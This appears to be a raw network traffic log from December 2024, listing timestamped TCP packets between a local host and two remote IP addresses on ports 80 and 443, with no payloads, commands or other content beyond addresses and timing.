                                                                                                                                                                                          Dec 18, 2024 09:07:30.281457901 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.281493902 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.282404900 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.285990953 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.286061049 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.286077023 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.286108017 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.290550947 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.290608883 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.290631056 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.290663004 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.295141935 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.295205116 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.295253038 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.299751043 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.299793005 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.299813986 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.299844027 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.304239988 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.304341078 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.405405998 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.405467033 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.405533075 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.406990051 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.407052040 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.407784939 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.407984018 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.407987118 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.408085108 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.411206007 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.411261082 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.411307096 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.411468029 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.414731026 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.414752960 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.414798975 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.414822102 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.418025970 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.418209076 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.418257952 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.421303034 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.421397924 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.421457052 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.424565077 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.424628973 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.424685955 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.425494909 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.427772045 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.427864075 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.427918911 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.427963972 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.430905104 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.430957079 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.431045055 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.431478977 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.434051991 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.434106112 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.434178114 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.434222937 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.437174082 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.437277079 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.437345982 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.437391996 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.440296888 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.440438986 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.440484047 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.441236019 CET44349721104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.441351891 CET44349721104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.441418886 CET49721443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:30.441567898 CET49721443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:30.441591024 CET44349721104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.443420887 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.443487883 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.443546057 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.443645954 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.446544886 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.446590900 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.446707964 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.446753025 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.449657917 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.449711084 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.449881077 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.449928045 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.452780008 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.452893019 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.452920914 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.452934027 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.455931902 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.455987930 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.456068039 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.456108093 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.459050894 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.459122896 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.459161997 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.459445000 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.462186098 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.462256908 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.462347984 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.462388992 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.465329885 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.465379000 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.465487003 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.465675116 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.468451977 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.468539953 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.468650103 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.468650103 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.471541882 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.471621990 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.471868038 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.471916914 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.474735022 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.474790096 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.474849939 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.474899054 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.477888107 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.477940083 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.477994919 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.478046894 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.480988026 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.481036901 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.481111050 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.481158972 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.484088898 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.484142065 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.484163046 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.484209061 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.487232924 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.487303972 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.487382889 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.487432957 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.490346909 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.490431070 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.490443945 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.490473986 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.493535042 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.493608952 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.493632078 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.493819952 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.496638060 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.496692896 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.496758938 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.496925116 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.499741077 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.499789953 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.499850988 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.500047922 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.503089905 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.503115892 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.503140926 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.503182888 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.505975008 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.506035089 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.506063938 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.506697893 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.509088039 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.509140968 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.509372950 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.509419918 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.512307882 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.512340069 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.512371063 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.512387991 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.515367031 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.515425920 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.515484095 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.596746922 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.596813917 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.596822023 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.597167015 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.597940922 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.597982883 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.598031998 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.598077059 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.600533962 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.600569010 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.600619078 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.603100061 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.603144884 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.603148937 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.603183985 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.605566025 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.605688095 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.605710030 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.605732918 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.608023882 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.608062983 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.608115911 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.610445976 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.610527039 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.610579967 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.610618114 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.612807035 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.612864971 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.612919092 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.612961054 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.615171909 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.615227938 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.615277052 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.615493059 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.617441893 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.617528915 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.617557049 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.617577076 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.619707108 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.619796991 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.619838953 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.621974945 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.622026920 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.622082949 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.622134924 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.624175072 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.624228954 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.624289989 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.624334097 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.626322985 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.626368046 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.626424074 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.626948118 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.628540993 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.628577948 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.628618002 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.630700111 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.630749941 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.630767107 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.630842924 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.632793903 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.632863045 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.632905006 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.634967089 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.635020971 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.635097027 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.635143995 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.637002945 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.637104034 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.637151003 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.639055014 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.639112949 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.639146090 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.639183044 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.641117096 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.641211033 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.641262054 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.643129110 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.643194914 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.643253088 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.645190954 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.645291090 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.645328045 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.645345926 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.647160053 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.647262096 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.647269964 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.647303104 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.649199963 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.649280071 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.649322987 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.651212931 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.651304960 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.651356936 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.653254986 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.653328896 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.653348923 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.653390884 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.655328989 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.655380964 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.655400038 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.655468941 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.657274008 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.657371044 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.657372952 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.657835960 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.659332037 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.659374952 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.659413099 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.659447908 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.661343098 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.661437988 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.661478043 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.663383961 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.663436890 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.663445950 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.665070057 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.665366888 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.665431023 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.665463924 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.665540934 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.667418957 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.667483091 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.667495966 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.667534113 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.669441938 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:30.669486046 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:30.669502020 CET804972031.41.244.11192.168.2.8
